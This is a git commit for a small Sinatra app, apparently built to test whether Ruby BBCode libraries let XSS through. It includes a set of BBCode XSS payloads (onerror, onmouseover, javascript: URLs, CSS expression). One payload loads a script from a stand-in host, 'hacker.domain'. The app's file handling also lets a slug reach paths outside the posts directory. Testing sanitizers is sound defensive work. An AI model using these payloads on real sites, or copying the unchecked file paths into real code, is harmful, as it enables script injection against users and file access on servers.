bbcode exploit tester

treetop
Jordan Orelli 9 years ago
commit c67e390c31

@ -0,0 +1,7 @@
source "http://rubygems.org"
gem "sinatra"
gem "thin"
gem "slim"
gem "bb-ruby"
gem "ruby-bbcode"

@ -0,0 +1,85 @@
require 'sinatra'
require 'slim'
require 'digest/sha1'
require 'bb-ruby'
require 'ruby-bbcode'
@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
get '/' do
@posts = list_posts
@engines = @@engines
slim :index
end
def show_create_page(engine)
get "/#{engine}" do
slim :input
end
end
def get_post(engine)
get "/#{engine}/:slug" do
body = read_post params[:slug]
@engine = 'bb-ruby'
@slug = params[:slug]
@other_engines = @@engines.select{|e| e != engine}
@bbcode_output = exec_bbcode engine, body
slim :output
end
end
def exec_bbcode(engine, body)
case engine
when "bb-ruby"
BBRuby.to_html body
when "ruby-bbcode"
RubyBBCode.to_html body
when "raw"
body
else
raise "unknown engine: #{engine}"
end
end
def create_post(engine)
post "/#{engine}" do
slug = store_post request
redirect to("#{engine}/#{slug}")
end
end
def setup_dir
begin
Dir.mkdir "posts"
rescue
end
end
def slugify(title)
title.downcase.strip.split(" ").join('-')
end
def store_post(request)
setup_dir
title = slugify(request["slug"])
comment = request["comment"]
File.write "posts/#{title}", comment
title
end
def read_post(slug)
file = File.open("posts/#{slug}", "r")
file.read
end
def list_posts
Dir.entries("posts").select{|entry| entry != '.' && entry != '..'}
end
@@engines.each do |engine|
show_create_page engine
get_post engine
create_post engine
end

@ -0,0 +1,2 @@
[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]

@ -0,0 +1 @@
[color=#ff0000;font-size:100px;]XSS[/color]

@ -0,0 +1 @@
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

@ -0,0 +1,2 @@
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

@ -0,0 +1,2 @@
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

@ -0,0 +1,2 @@
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

@ -0,0 +1,2 @@
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

@ -0,0 +1 @@
[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url]

@ -0,0 +1 @@
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]

@ -0,0 +1 @@
[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube]

@ -0,0 +1 @@
[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]

@ -0,0 +1,2 @@
alert("This is an alert. You've been XSSed.");

@ -0,0 +1,21 @@
doctype html
html
head
title pick an engine
body
#content
h1 create a sploit
ul
- @@engines.each do |engine|
li
a href="#{engine}" = engine
#existing
h1 list sploits
table
- @posts.each do |post|
tr
td = post
- @@engines.each do |engine|
td
a href="#{engine}/#{post}" view in #{engine}

@ -0,0 +1,16 @@
doctype html
html
head
title pwn
body
h1 add your dope sploit
form method='post' name='sploit'
label for='slug' slug
br
input name='slug' type='text'
br
label for='comment' bbcode input
br
textarea name='comment' rows=10 cols=80
br
input type='submit'

@ -0,0 +1,13 @@
doctype html
html
head
title output
body
#content
== @bbcode_output
ul
li
a href="/#{@engine}" try again
- @other_engines.each do |engine|
li
a href="/#{engine}/#{@slug}" view in #{engine}
Loading…
Cancel
Save